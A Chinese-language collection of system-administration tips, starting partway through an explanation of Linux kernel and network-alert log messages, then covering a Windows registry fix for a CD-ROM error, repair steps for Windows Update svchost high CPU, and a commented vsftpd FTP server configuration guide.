这些提示是网络通信中出现严重问题时才会出现. 故障基本和网络断线有关系. 这几条提示分别代表的含意是 某块网卡传送数据超时; 网卡连接down; 网卡连接up,连接速率为10/100Mbps,全/半双功.
这里写到的最后三行的提示比较类似. 出现这类提示时必须注意网络连接状况进行处理!!!

报警程序的提示
0001 ##WMPCheckV001## 2005-04-13_10:10:01 Found .(ARP Spoofing sniffer)! IP:183 MAC:5
0002 ##WMPCheckV001## 2005-04-07_01:53:32 Found .(MAC_incomplete)! IP:173 mac_incomplete:186
0003 ##WMPCheckV001## 2005-04-17_16:25:11 Found .(HIGH_synsent)! totl:4271 SynSent:3490
0004 ##WMPCheckV001## 20......
这是由报警程序所引起的提示. 详细的信息需要用报警程序的客户端进行实时接收.详细情况请查看"告警模块和日志".

一般类的提示
kernel: eth1: Promiscuous mode enabled.
kernel: device eth1 entered promiscuous mode
kernel: device eth1 left promiscuous mode
这几行提示指. 某块网卡进入(离开)了混杂模式. 一般来说混杂模式是当需要对通信进行抓包时才用到的. 当使用维护或故障分析时会使用到(比如consoletools中的countflow命令). 正常产生的这类提示可以忽略.
如果在前台和远端都没有进行维护时出现这个提示倒是应该引起注意,但这种可能性不大.

基本无关
kernel: keyboard: unknown scancode e0 5e
键盘上接收到未定义的键值. 如果经常出现.有可能是键盘有问题. linux对于比较特殊的键或是组合键,有时也会出这样的提示.
要看一下服务器的键盘是不是被压住了. 其它情况一般忽略.

基本无关
uses obsolete (PF_INET,SOCK_PACKET)
系统内核调用了一部分功能模块,在第一次调入时会出现. 一般情况与使用调试工具有关. 可直接忽略.

光驱注册表可能已损坏。 (代码 19) 解决方案

家里一台2000上换了块光驱，发现不能用，查看系统发现硬件前面有黄色感叹号,无法使用，具体的错误是：注册表可能已损坏。 (代码 19)
用如下方法恢复的：进入注册表,到 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E965-E325-11C E-BFC1-08002BE10318} 删除“upperfilter”项和“loweverfilter”项 重起计算机

windows自动更新（Automatic Updates）SVCHOST.exe占用CPU 100%解决方案

家里有台机器自动更新服务总是占CPU100%，然后查了下资料，最后解决方案如下：

1、对于XP、2003

当系统通知区域显示黄盾图标的时候就是在进行“自动更新”（Automatic Updates）操作，出现SVCHOST.exe占用CPU 100%的问题已被微软官方验证是系统问题，微软官方已提供补丁来解决这个问题，请见：
http://support.microsoft.com/kb/932494/zh-cn
http://support.microsoft.com/kb/927891/zh-cn
http://www.microsoft.com/downloads/details.aspx?displaylang=zh-cn&FamilyID=7a81b0cd-a0b9-497e-8a89-404327772e5a

注：当安装基于Windows Installer 3.1安装包的程序出现SVCHOST.exe占用CPU 100%的问题的时候也可以参考上面的解决办法。

2、对于2000

当你运行 Windows 自动更新、Windows Update、 Microsoft Update 等进行更新时出现意外而被中止，或者使用通过“自动更新”累积的数据太多，一段时间之后，都会造成“正在查找适用于您计算机的最新更新程序...”运行时的困难而缓慢工作，久而久之，你的 Windows 自动更新就彻底崩溃了，即而出现 CPU 一直占用 100% 的情况。如果此时你已经把 Windows 自动更新打开，在计算机开机不久后，只要接入了网络，联络到微软的服务器上，就会出现这种情况，机器变的异常缓慢，一个 svchost.exe 进程占用内存极高，机器无法正常工作。顺便说明一下，无网络的情况下，是不会出现这种情况的。怎么办呢，重新安装系统？太夸张了吧，把“自动更新”彻底停用？这也说不过去的哦！

不要嫌麻烦了，参照下面的步骤进行解决吧，这样还是方便些...

一、关闭自动更新（我的电脑-属性-自动更新-关闭）, 重新启动计算机，如下检查或操作

1. 点“开始-运行”, 输入 services.msc 并回车
2. 双击服务 Automatic Updates
3. 点“登录”选项卡, 确保选项“本地系统帐户”被选中，并其中的“允许服务与桌面交互”不被选中
4. 检查下面“硬件配置文件”中的服务已经启用，如果没有，请点击“启用”按钮，激活它
5. 点回“常规”选项卡，设“启动类型”为“自动”，在“服务状态”下面点击“启动”按钮，开启这个服务
6. 重复上面的步骤，对另一个服务: Background Intelligent Transfer Service (BITS) 进行同样的操作，一定要开启此服务，很多人会忽视它

二、重新注册 Windows Update 组件

1.点“开始-运行”, 输入命令 REGSVR32 WUAPI.DLL 并回车
2.当你看到“WUAPI.DLL中的 DllRegisterServer 成功”这个消息就说明成功了
3.请重复这个步骤，逐一运行下面的命令
REGSVR32 WUAUENG.DLL
REGSVR32 WUAUENG1.DLL
REGSVR32 ATL.DLL
REGSVR32 WUCLTUI.DLL
REGSVR32 WUPS.DLL
REGSVR32 WUPS2.DLL
REGSVR32 WUWEB.DLL

三、清除被破坏的 Windows Update 临时文件夹

1. 点“开始-运行”,输入命令 net stop WuAuServ 并回车
2. 点“开始-运行”, 输入命令 %windir% 并回车，在打开的文件夹窗口中，找到文件夹 SoftwareDistribution 把它改名成 SoftwareDistribution1（或别的，可任意）
3. 点“开始-运行”, 输入命令 net start WuAuServ 并回车

四、重新启动计算机，点“我的电脑 - 属性 - 自动更新”把“自动（推荐）”选中，或者定期打开下面地址进行 你的 Windows 更新吧
http://update.microsoft.com/windowsupdate/v6/default.aspx?ln=zh-cn
本人推荐定期去网站更新，不要打开“自动更新”功能，这样即使出了问题也好解决

注：在你使用“自动更新”一段时间后，也可能就会重新出现这个棘手的毛病，这完全是微软方面的事，我在这也不想多说，你只要重新按照上面的步骤搞一下就能恢复如初了。

参考翻译自：

If you turn on automatic updating for you machine, every Tuesday-ish, Microsoft will send you patches, and they'll quietly install. Amazingly, these patches (at least for me) never break anything. Until now, that is. After a recent update, my machine would spit out the following message every time I would boot.

svchost.exe -- application error the instruction at "0x745f2780" reference memory at "0x00000000". the memory could not be 'read'

Looking into the event log yielded the following:

Faulting application svchost.exe, version 5.1.2600.2180, faulting module msi.dll, version 3.1.4000.2435, fault address 0x00012780.

The problem wasn't so much this error message, but the fact then when the dialog with the error was closed, the machine became unusable (no new executables would start). If I left the dialog open, I could use my machine "normally", but it would hang on shutdown.

Something with Windows Update broke something with the Windows Installer. Reinstalling Windows Installer 3.1 didn't solve the problem, but the follow spelunked from Google saved my bacon:

Perform these steps leaving the svchost crash dialog open.

1. Click Start->Run, type "services.msc" (without quotation marks) in the open box and click OK.
2. Double click the service "Automatic Updates".
3. Click on the Log On tab, please ensure the option "Local System account" is selected and the option "Allow service to interact with desktop" is unchecked.
4. Check if this service has been enabled on the listed Hardware Profile. If not, please click the Enable button to enable it.
5. Click on the tab "General "; make sure the "Startup Type" is "Automatic". Then please click the button "Start" under "Service Status" to start the service.
6. Repeat the above steps with the other service: Background Intelligent Transfer Service (BITS)

Step 4: Re-register Windows Update components and Clear the corrupted Windows Update temp folder
================================

1. Click on Start and then click Run,
2. In the open field type "REGSVR32 WUAPI.DLL" (without quotation marks) and press Enter.
3. When you receive the "DllRegisterServer in WUAPI.DLL succeeded" message, click OK.
4. Please repeat these steps for each of the following commands:

REGSVR32 WUAUENG.DLL
REGSVR32 WUAUENG1.DLL
REGSVR32 ATL.DLL
REGSVR32 WUCLTUI.DLL
REGSVR32 WUPS.DLL
REGSVR32 WUPS2.DLL
REGSVR32 WUWEB.DLL

After the above steps are finished. Sicne temporary folder of Windows Update may be corrupted. We can refer to the following steps to rename this folder that

1. Click Start, Run, type: cmd and press Enter. Please run the following command in the opened window.

net stop WuAuServ

(note, you might need to reboot before the net stop command will work)

2. Click Start, Run, type: %windir% and press Enter.
3. In the opened folder, rename the folder SoftwareDistribution to SDold.
4. Click Start, Run, type: cmd and press Enter. Please run the following command in the opened window.

net start WuAuServ

UPDATE: This post has received a ton of comments. One, in particular, suggests an easier fix for this problem:

1.Go 2 the start menu
2.Right click "my computer"
3.Click "properties" then the "automatic updates"
4.Choose "turn off automatic updates"
5.Reboot your computer
6.Go back to start menu and in all programs go to "windows update" you have to be connected to the internet.
7.Manually update windows.
8.Turn your automatic updates back on.

I have also had a number of people comment that the problem reappears after some time. The recommended fix, if the problem reappears, is to turn off automatic updates, and just manually go to Windows Update periodically and update your machine.

Thanks for all the comments. I've very please to know that this is solving the problem for many people.

vsftpd安装和配置文件的注释解析

一、安装
vsftpd， redhat自带的ftp工具，非常实用而且安全。在安装linux时选择安装ftp，如果没有安装的则可以在图形环境下单击"主菜单→系统设置→添加删除应用程序"菜单项，在出现的"软件包管理"对话框里确保选中"FTP服务器"选项，然后单击"更新"按钮，按照屏幕提示用系统盘直接安装或到官方ftp://vsftpd.beasts.org/users/cevans/vsftpd-2.0.5.tar.gz下载。

可以用rpm –q vsftpd 来查看是否安装了vsftpd

二、vsftpd的配置文件注释解析

安装了vsftpd，要配置属于自己的ftp，就要了解它

vsftpd有4个配置文件：

vsftpd.conf（主配置文件，在/etc/vsftpd）

vsftpd.chroot_list（根据主配置文件是否将用户限制在家目录列表，在/etc）

vsftpd.ftpusers（不允许登陆ftp用户列表，在/etc）

vsftpd.user_list（根据主配置文件是否允许登陆ftp用户列表，在/etc）

下面具体说下主配置文件vsftpd.conf

vsftpd.conf中带“＃”的是注释行，是不去执行的代码。

除去多余的注释，其内容如下：

anonymous_enable=YES //允许匿名用户登陆

local_enable=YES //允许本地用户登录

write_enable=YES //开启全局写的权限

local_umask=022 //用户上传的文件权限,默认077

#anon_upload_enable=YES //允许匿名用户上传文件

#anon_mkdir_write_enable=YES //允许匿名用户创建目录

dirmessage_enable=YES //用户首次进入新目录显示欢迎信息

xferlog_enable=YES //是否激活上传和下传的日志？可以通过 vsftpd_log_file 选项来指定log的位置

connect_from_port_20=YES //启用FTP数据端口的数据连接。

#chown_uploads=YES //是否激活将所有匿名上载的文件的宿主调整为 chown_username 中指定的用户

#chown_username=whoever

#xferlog_file=/var/log/vsftpd.log //日志文件在var/log/vsftpd.log。

xferlog_std_format=YES //使用标准的日志格式。

#idle_session_timeout=600 //连接空闲最长时间，秒

#data_connection_timeout=120 //数据连接超时时间，秒

#nopriv_user=ftpsecure //指定一个用户, 当 vsftpd 要切换到无权限状态时, 使用此用户

#async_abor_enable=YES //激活一个特别的 FTP 命令 "async ABOR"

#ascii_upload_enable=YES //启用上传的ASCII传输方式。

#ascii_download_enable=YES //启用下载的ASCII传输方式。

#ftpd_banner=Welcome to blah FTP service. //显示欢迎信息。

#deny_email_enable=YES //提供一个禁止匿名用户用做密码的 e-mail 地址列表

# (default follows)

#banned_email_file=/etc/vsftpd.banned_emails //e-mail地址列表文件

#chroot_list_enable=YES //启用chroot用户里表功能，如果启用了chroot_local_user选项, 此文件所包含的则为不会被限制在家目录中的用户列表.

# (default follows)

#chroot_list_file=/etc/vsftpd.chroot_list

#ls_recurse_enable=YES //允许用户使用 "ls"命令

pam_service_name=vsftpd //用于指定 PAM 服务的名称

userlist_enable=YES //是否从 userlist_file 选项指定的文件中加载一个用户名列表

listen=YES //是否让vsftpd以独立模式运行

tcp_wrappers=YES //是否编译 vsftpd 时加入对 TCP_Wrappers 的支持

我们可以根据自己的情况进行相应的配置了,这里面需要注意的有以下几点(个人意见)

1．对匿名用户的配置：如果需要开启匿名用户的上传和修改权限，除了需要设置anon_upload_enable=YES和write_enable=TES外，还需要对匿名用户所需要上传的文件夹给予相应的权限chmod o+w /文件夹路径（给予除该文件夹所有者以外用户写的权限）。默认的文件权限是不允许除文件所有者以外的用户对该文件进行写入和修改操作的。

2．vsftpd.chroot_list：它是限制用户离开主目录列表（一行一个用户），默认路径在/etc/，也可以用chroot_list_file来指定它的路径。用chroot_list_enable=YES/NO设置是否启用它。启用后，当chroot_local_user（是否关闭已有的限制所有系统用户设置）=NO时，该列表中的用户将被限制到它的主目录中，不允许登陆其它目录；chroot_local_user=YES时，该列表中的用户将不受限制。个人建议启用并且不关闭已有的用户限制，不允许系统用户登陆ftp，设置不允许登陆系统的ftp专用用户加载到列表中，这样可以曾强ftp的安全性。

3．vsftpd.user_list：它是限ftp访问用户列表（一行一个用户），默认路径在/etc/，也可以用Userlist_file来指定它的路径。用userlist_enable=YES 来设置是否启用它。启用后，当userlist_deny=NO时，该列表中的用户将会在询问密码前被拒绝。当userlist_deny=YES时，只有该列表中的用户才被允许登陆。

4．对ftp数据连接端口的设定：大家都知道ftp标准的连接端口是21，如果我们把ftp的数据连接端口设置成非标准端口的话，遭受攻击的可能性就会更小。我们可以用Listen_port=端口，来设定一个非标准的端口。

5．其它的安全设置：

accept_timeout=60（秒） （将客户端空闲1分钟后断）

connect_timeout=60（秒） （中断1分钟后又重新连接）

local_max_rate=50000（bite） （本地用户传输率50K）

anon_max_rate=30000（bite） （匿名用户传输率30K）

pasv_min_port=50000 （将客户端的数据连接端口改在

pasv_max_port=60000 50000—60000之间）

max_clients=200 （FTP的最大连接数）

max_per_ip=4 （每IP的最大连接数）

listen_address=ip address （如果服务器有多ip用此绑定需要监听的ip）
ps –xf |grep （查看谁登陆了ftp） ftp kill 进程号 （杀掉它）
三、配置

有了这些资料，相信不难配置出适合自己的ftp了，接下来就开始

先从vsftp.conf开始：

＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃

anonymous_enable=YES

local_enable=YES

write_enable=YES

local_umask=022

dirmessage_enable=YES

nopriv_user=ftpuser

xferlog_enable=YES

connect_from_port_20=YES

xferlog_file=/var/log/vsftpd.log

idle_session_timeout=1800

chroot_local_user=NO

chroot_list_enable=YES

chroot_list_file=/etc/vsftpd.chroot_list

ls_recurse_enable=YES

＃匿名用户只能读取、本地用户有完全控制权、启用日志、启用vsftpd.chroot_list列表记录不允许离开主目录的用户等

anon_max_rate=300000

max_clients=50

max_per_ip=3

listen_port=xxxx

＃设定非标准数据连接端口xxxx等

pam_service_name=vsftpd

userlist_enable=YES

listen=YES

tcp_wrappers=YES

＃启用vsftpd.user_list列表记录不允许登陆的用户等

＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃

这样配置不允许匿名用户有读取以外的权限，给予指定的本地用户完全控制权限。

为了方便ftp的管理和安全：

[root@localhost ~]# groupadd ftpuser //新建用户组ftpuser

[root@localhost ~]# useradd –g groupadd –d /var/ftp –s /sbin/nologin ftpuser //新建ftpuser，属于ftpuser组，家目录为/var/ftp，不允许登陆系统

[root@localhost ~]# passwd ftpuser //设置用户密码，不设置密码新建用户被锁定无法登陆

然后将除ftpuser以外的本地用户都添加到vsftpd.ftpusers和vsftpd.user_list中，不允许其它本地用户登陆ftp；将ftpuser和匿名用户（Anonymous）添加到vsftpd.chroot_list中，将ftpuser和匿名用户限制在它们的主目录/var/ftp中，不允许离开。

再设定一些安全机制如连接最大闲置时间、限制匿名用户传输速度300k、修改数据连接端口、限制最大连接数等。

配置好了vsftpd.conf，接下来再对ftp文件夹设置相应的权限就可以了。因为/var/ftp是属于root用户，并且其它用户无权对该文件夹进行写的权限，这样ftpuser用户就无法完全控制该文件夹，只有和匿名用户一样的权限，只能下载和查看。所以需要对ftp文件夹的权限进行修改：

[root@localhost var]# chgrp ftpuser ftp //把ftp的属组改为ftpuser

[root@localhost var]# chown ftpuser ftp //把ftp的属主改为ftpuser

[root@localhost var]# chmod 755 ftp //把ftp的权限改为755，只有属主有读写权限，其他用户只能读取

这样ftpuser就对ftp有了完全管理的权限，其他用户只有读取的权限。

经过以上的配置，一个实用安全的ftp就建好了。

四、补充技巧

1．在ftp中建立个人文件夹：很简单，新建文件夹a，将a的属主设为需要的用户auser，并将它的权限设为700（只给予所有者读写的权限），还要将auser加入ftpuser组使它能够登陆ftp：

[root@localhost var]# mkdir a //新建文件夹a

[root@localhost var]# chgrp auser a //把a的属组改为auser

[root@localhost var]# chown auser a //把a的属主改为auser

[root@localhost var]# chmod 700 a //把a的权限改为700，只有属主有读写权限，其他用户无任何权限

这样登陆ftp的其它用户就无法访问该文件夹了，包括上级目录所有者也无权访问。